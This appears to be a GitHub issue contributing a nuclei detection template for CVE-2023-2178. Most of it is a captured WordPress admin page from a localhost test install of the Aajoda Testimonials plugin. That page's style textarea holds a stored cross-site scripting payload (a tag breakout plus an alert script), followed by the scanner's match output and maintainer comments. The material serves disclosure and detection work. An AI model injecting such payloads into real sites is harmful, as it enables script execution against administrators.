<a href='options-general.php' class="wp-has-submenu wp-has-current-submenu wp-menu-open menu-top menu-icon-settings" ><div class="wp-menu-arrow"><div></div></div><div class='wp-menu-image dashicons-before dashicons-admin-settings' aria-hidden='true'><br /></div><div class='wp-menu-name'>Settings</div></a>
<ul class='wp-submenu wp-submenu-wrap'><li class='wp-submenu-head' aria-hidden='true'>Settings</li><li class="wp-first-item"><a href='options-general.php' class="wp-first-item">General</a></li><li><a href='options-writing.php'>Writing</a></li><li><a href='options-reading.php'>Reading</a></li><li><a href='options-discussion.php'>Discussion</a></li><li><a href='options-media.php'>Media</a></li><li><a href='options-permalink.php'>Permalinks</a></li><li><a href='options-privacy.php'>Privacy</a></li></ul></li>
<li class="wp-has-submenu wp-not-current-submenu menu-top toplevel_page_i4t3-logs menu-top-last" id="toplevel_page_i4t3-logs"><a href='admin.php?page=i4t3-logs' class="wp-has-submenu wp-not-current-submenu menu-top toplevel_page_i4t3-logs menu-top-last" aria-haspopup="true"><div class="wp-menu-arrow"><div></div></div><div class='wp-menu-image dashicons-before dashicons-redo' aria-hidden='true'><br /></div><div class='wp-menu-name'>404 to 301</div></a>
<ul class='wp-submenu wp-submenu-wrap'><li class='wp-submenu-head' aria-hidden='true'>404 to 301</li><li class="wp-first-item"><a href='admin.php?page=i4t3-logs' class="wp-first-item">404 Error Logs</a></li><li><a href='admin.php?page=i4t3-settings'>404 Settings</a></li></ul></li>
<li class="wp-not-current-submenu wp-menu-separator" aria-hidden="true"><div class="separator"></div></li>
<li class="wp-not-current-submenu menu-top toplevel_page_aajoda-testimonials menu-top-first menu-top-last" id="toplevel_page_aajoda-testimonials">
<a href='admin.php?page=aajoda-testimonials' class="wp-not-current-submenu menu-top toplevel_page_aajoda-testimonials menu-top-first menu-top-last" ><div class="wp-menu-arrow"><div></div></div><div class='wp-menu-image dashicons-before' aria-hidden='true'><img src="http://localhost:8080/wp-content/plugins/aajoda-testimonials/img/aajodatestimonials-icon.png" alt="" /></div><div class='wp-menu-name'>Aajoda</div></a></li><li id="collapse-menu" class="hide-if-no-js"><button type="button" id="collapse-button" aria-label="Collapse Main menu" aria-expanded="true"><span class="collapse-button-icon" aria-hidden="true"></span><span class="collapse-button-label">Collapse menu</span></button></li></ul>

	<div id="wpadminbar" class="nojq nojs">
					<div class="quicklinks" id="wp-toolbar" role="navigation" aria-label="Toolbar">
			<ul id='wp-admin-bar-root-default' class="ab-top-menu"><li id='wp-admin-bar-menu-toggle'><a class='ab-item' href='#'><span class="ab-icon" aria-hidden="true"></span><span class="screen-reader-text">Menu</span></a></li><li id='wp-admin-bar-wp-logo' class="menupop"><a class='ab-item' aria-haspopup="true" href='http://localhost:8080/wp-admin/about.php'><span class="ab-icon" aria-hidden="true"></span><span class="screen-reader-text">About WordPress</span></a><div class="ab-sub-wrapper"><ul id='wp-admin-bar-wp-logo-default' class="ab-submenu"><li id='wp-admin-bar-about'><a class='ab-item' href='http://localhost:8080/wp-admin/about.php'>About WordPress</a></li></ul><ul id='wp-admin-bar-wp-logo-external' class="ab-sub-secondary ab-submenu"><li id='wp-admin-bar-wporg'><a class='ab-item' href='https://wordpress.org/'>WordPress.org</a></li><li id='wp-admin-bar-documentation'><a class='ab-item' href='https://wordpress.org/documentation/'>Documentation</a></li><li id='wp-admin-bar-support-forums'><a class='ab-item' href='https://wordpress.org/support/forums/'>Support</a></li><li id='wp-admin-bar-feedback'><a class='ab-item' href='https://wordpress.org/support/forum/requests-and-feedback'>Feedback</a></li></ul></div></li><li id='wp-admin-bar-site-name' class="menupop"><a class='ab-item' aria-haspopup="true" href='http://localhost:8080/'>admin</a><div class="ab-sub-wrapper"><ul id='wp-admin-bar-site-name-default' class="ab-submenu"><li id='wp-admin-bar-view-site'><a class='ab-item' href='http://localhost:8080/'>Visit Site</a></li></ul></div></li><li id='wp-admin-bar-updates'><a class='ab-item' href='http://localhost:8080/wp-admin/update-core.php'><span class="ab-icon" aria-hidden="true"></span><span class="ab-label" aria-hidden="true">7</span><span class="screen-reader-text updates-available-text">7 updates available</span></a></li><li id='wp-admin-bar-comments'><a class='ab-item' href='http://localhost:8080/wp-admin/edit-comments.php'><span class="ab-icon" aria-hidden="true"></span><span class="ab-label awaiting-mod pending-count count-0" aria-hidden="true">0</span><span class="screen-reader-text comments-in-moderation-text">0 Comments in moderation</span></a></li><li id='wp-admin-bar-new-content' class="menupop"><a class='ab-item' aria-haspopup="true" href='http://localhost:8080/wp-admin/post-new.php'><span class="ab-icon" aria-hidden="true"></span><span class="ab-label">New</span></a><div class="ab-sub-wrapper"><ul id='wp-admin-bar-new-content-default' class="ab-submenu"><li id='wp-admin-bar-new-post'><a class='ab-item' href='http://localhost:8080/wp-admin/post-new.php'>Post</a></li><li id='wp-admin-bar-new-media'><a class='ab-item' href='http://localhost:8080/wp-admin/media-new.php'>Media</a></li><li id='wp-admin-bar-new-page'><a class='ab-item' href='http://localhost:8080/wp-admin/post-new.php?post_type=page'>Page</a></li><li id='wp-admin-bar-new-ticket'><a class='ab-item' href='http://localhost:8080/wp-admin/post-new.php?post_type=ticket'>Ticket</a></li><li id='wp-admin-bar-new-pets'><a class='ab-item' href='http://localhost:8080/wp-admin/post-new.php?post_type=pets'>Pets</a></li><li id='wp-admin-bar-new-user'><a class='ab-item' href='http://localhost:8080/wp-admin/user-new.php'>User</a></li></ul></div></li><li id='wp-admin-bar-wpas_tickets' class="wpas-my-tickets"><a class='ab-item' href='http://localhost:8080/wp-admin/edit.php?post_type=ticket&#038;wpas_status=open' target='_self' title='Open tickets assigned to you'><span class="ab-icon"></span> 0</a></li></ul><ul id='wp-admin-bar-top-secondary' class="ab-top-secondary ab-top-menu"><li id='wp-admin-bar-my-account' class="menupop with-avatar"><a class='ab-item' aria-haspopup="true" href='http://localhost:8080/wp-admin/profile.php'>Howdy, <span class="display-name">admin</span><img alt='' src='http://1.gravatar.com/avatar/75d23af433e0cea4c0e45a56dba18b30?s=26&#038;d=mm&#038;r=g' srcset='http://1.gravatar.com/avatar/75d23af433e0cea4c0e45a56dba18b30?s=52&#038;d=mm&#038;r=g 2x' class='avatar avatar-26 photo' height='26' width='26' loading='lazy' decoding='async'/></a><div class="ab-sub-wrapper"><ul id='wp-admin-bar-user-actions' class="ab-submenu"><li id='wp-admin-bar-user-info'><a class='ab-item' tabindex="-1" href='http://localhost:8080/wp-admin/profile.php'><img alt='' src='http://1.gravatar.com/avatar/75d23af433e0cea4c0e45a56dba18b30?s=64&#038;d=mm&#038;r=g' srcset='http://1.gravatar.com/avatar/75d23af433e0cea4c0e45a56dba18b30?s=128&#038;d=mm&#038;r=g 2x' class='avatar avatar-64 photo' height='64' width='64' loading='lazy' decoding='async'/><span class='display-name'>admin</span></a></li><li id='wp-admin-bar-edit-profile'><a class='ab-item' href='http://localhost:8080/wp-admin/profile.php'>Edit Profile</a></li><li id='wp-admin-bar-logout'><a class='ab-item' href='http://localhost:8080/wp-login.php?action=logout&#038;_wpnonce=fca2fd5ad4'>Log Out</a></li></ul></div></li></ul>			</div>
					<a class="screen-reader-shortcut" href="http://localhost:8080/wp-login.php?action=logout&#038;_wpnonce=fca2fd5ad4">Log Out</a>
				</div>

		<div id="contextual-help-wrap" class="hidden no-sidebar" tabindex="-1" aria-label="Contextual Help Tab">
			<div id="contextual-help-back"></div>
			<div id="contextual-help-columns">
				<div class="contextual-help-tabs">
					<ul>
											</ul>
				</div>

				
				<div class="contextual-help-tabs-wrap">
										</div>
			</div>
		</div>
			</div>
		<div class="updated wpas-wizard-notice">
	<h1 class="wizard-main-heading">Awesome Support: First Time Install</h1>
	<p class="wizard-first-line">Thank you for installing Awesome Support. Please choose an option below to get started.</p>
	<p class="wizard-normal wizard-second-line">If this is not the first time you are using Awesome Support or you would like to manually configure your initial settings, then you should choose to skip this process. Otherwise proceed by clicking the orange button.</p>		
	<p><span class="wpas-button-wizard-primary"><a href="http://localhost:8080/wp-admin/index.php?page=as-setup">Click here To Get Started Now</a></span>		
		<span class="wpas-button-wizard-skip"><a href="#" id="wpas-skip-wizard">Or skip this process</a>		</p>		
</div>

Aajoda Testimonials Options

<input type="hidden" name="aajodatestimonials_opt_hidden" value="Y">
<div class="metabox-holder">
		<div class="postbox"> 

		<h3>Aajoda WP Shortcodes</h3>

		<div style="padding:0 10px 20px 10px;" >

			<p>Fetch your Aajoda WP shortcode from <a href="https://www.aajoda.com/customerdash/customerintegration2" target="_blank">aajoda.com</a> and paste it in any post or page in your website like this:</p>
			<code>
			[aajoda id="xxxxxxxxx"]
			</code>
		</div>

	</div>
</div>

<!-- version select -->
<div>
	<h3>Select version</h3>

			
	<select name='aajoda_version'>
		<option value='2.0'  selected='selected'>2.0</option>
		<option value='2.1' >2.1 (beta)</option>
	</select>
</div>


<div class="metabox-holder">
	<div class="postbox"> 
		<h3>Optional Aajoda Style</h3>
		<div style="padding:0 10px 10px 10px;" >
			<p>Place optional css style for Aajoda in this textarea below</p>
			<textarea name="aajodatestimonials_code" rows="8" cols="90" />&quot;&gt;&lt;/textarea&gt;&lt;script&gt;alert(/template by farish/)&lt;/script&gt;
</textarea> 
<input type="submit" name="Submit" class="button-primary" value="Save" />

Version 6.2.2 

		<script type="text/javascript">
			jQuery(document).ready(function ($) {

				// Hook into the heartbeat-send
				$(document).on('heartbeat-send', function (e, data) {
					data['rdn_maybe_fetch'] = ["21690156800"];
				});

				// Listen for the custom event "heartbeat-tick" on $(document).
				$(document).on('heartbeat-tick', function (e, data) {

					if (typeof(data.rdn_fetch) !== 'undefined' && data.rdn_fetch !== '') {

						ajax_data = {
							'action': 'rdn_fetch_notifications',
							'notices': data.rdn_fetch
						};

						$.post(ajaxurl, ajax_data);

					}

				});
			});
		</script>

	            <script type="text/javascript">
            (function ($) {
                $(document).ajaxSend(function (event, jqxhr, settings) {
                    if (settings.url &&
                        -1 < settings.url.indexOf('admin-ajax.php') &&
                        ! ( settings.url.indexOf( '_fs_blog_admin' ) > 0 )
                    ) {
                        if (
                            'string' === typeof settings.data &&
                            settings.data.indexOf( 'action=heartbeat' ) > 0
                        ) {
                            return;
                        }

                        if (settings.url.indexOf('?') > 0) {
                            settings.url += '&';
                        } else {
                            settings.url += '?';
                        }

                        settings.url += '_fs_blog_admin=true';
                    }
                });
            })(jQuery);
        </script>
                    <script type="text/javascript">
            (function ($) {
                $('.fs-submenu-item.wp-support-forum').parent().attr( { target: '_blank', rel: 'noopener noreferrer' } );
            })(jQuery);
        </script>
        		<script>
	jQuery(document).ready(function() {
		'use strict';
		if ( typeof jQuery.fn.wpColorPicker !== 'undefined' ) {
			jQuery('.tf-colorpicker').wpColorPicker();
		}
	});
	</script>
		<div id="wp-auth-check-wrap" class="hidden">
<div id="wp-auth-check-bg"></div>
<div id="wp-auth-check">
<button type="button" class="wp-auth-check-close button-link"><span class="screen-reader-text">
	Close dialog	</span></button>
		<div id="wp-auth-check-form" class="loading" data-src="http://localhost:8080/wp-login.php?interim-login=1&#038;wp_lang=en_US"></div>
		<div class="wp-auth-fallback">
	<p><b class="wp-auth-fallback-expired" tabindex="0">Session expired</b></p>
	<p><a href="http://localhost:8080/wp-login.php" target="_blank">Please log in again.</a>
	The login page will open in a new tab. After logging in you can close it and return to this page.</p>
</div>
</div>
</div>
<script src='http://localhost:8080/wp-admin/load-scripts.php?c=1&amp;load%5Bchunk_0%5D=hoverIntent&amp;ver=6.2.2'></script>
<script src='http://localhost:8080/wp-admin/js/common.min.js?ver=6.2.2' id='common-js'></script> <script src='http://localhost:8080/wp-includes/js/hoverintent-js.min.js?ver=2.2.1' id='hoverintent-js-js'></script> <script src='http://localhost:8080/wp-includes/js/admin-bar.min.js?ver=6.2.2' id='admin-bar-js'></script> <script src='http://localhost:8080/wp-admin/js/svg-painter.js?ver=6.2.2' id='svg-painter-js'></script> <script id='heartbeat-js-extra'> var heartbeatSettings = {"nonce":"d41f2cac32"}; </script> <script src='http://localhost:8080/wp-includes/js/heartbeat.min.js?ver=6.2.2' id='heartbeat-js'></script> <script src='http://localhost:8080/wp-includes/js/wp-auth-check.min.js?ver=6.2.2' id='wp-auth-check-js'></script> <script src='http://localhost:8080/wp-content/plugins/awesome-support/vendor/gambitph/titan-framework/js/select2/select2.min.js?ver=1.12.1' id='tf-select2-js'></script> <script src='http://localhost:8080/wp-includes/js/underscore.min.js?ver=1.13.4' id='underscore-js'></script>
<script type="text/javascript">if(typeof wpOnload==='function')wpOnload();</script> [CVE-2023-2178:dsl-1] [http] [medium] http://localhost:8080/wp-admin/options-general.php?page=aajoda-testimonials
@muhamedfarish muhamedfarish added the nuclei-template Nuclei template contribution label Jul 24, 2023
@ritikchaddha ritikchaddha added the good first issue Good for newcomers label Jul 24, 2023
@muhamedfarish
Copy link
Author

when you approve this template?

@ritikchaddha ritikchaddha linked a pull request Jul 25, 2023 that will close this issue
Create CVE-2023-2178.yaml #7760
Merged
2 tasks
@ritikchaddha ritikchaddha added the Done Ready to merge label Jul 25, 2023
@DhiyaneshGeek
Copy link
Member

Hi @muhamedfarish , thank you so much for sharing this template with the community and contributing to this project 🍻

You can join our discord server. It's a great place to connect with fellow contributors and stay updated with the latest developments. Thank you once again

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees

@ritikchaddha ritikchaddha

Labels
Done Ready to merge good first issue Good for newcomers nuclei-template Nuclei template contribution
Projects
None yet
Milestone
No milestone
Development

Successfully merging a pull request may close this issue.

Create CVE-2023-2178.yaml projectdiscovery/nuclei-templates
3 participants
@DhiyaneshGeek @ritikchaddha @muhamedfarish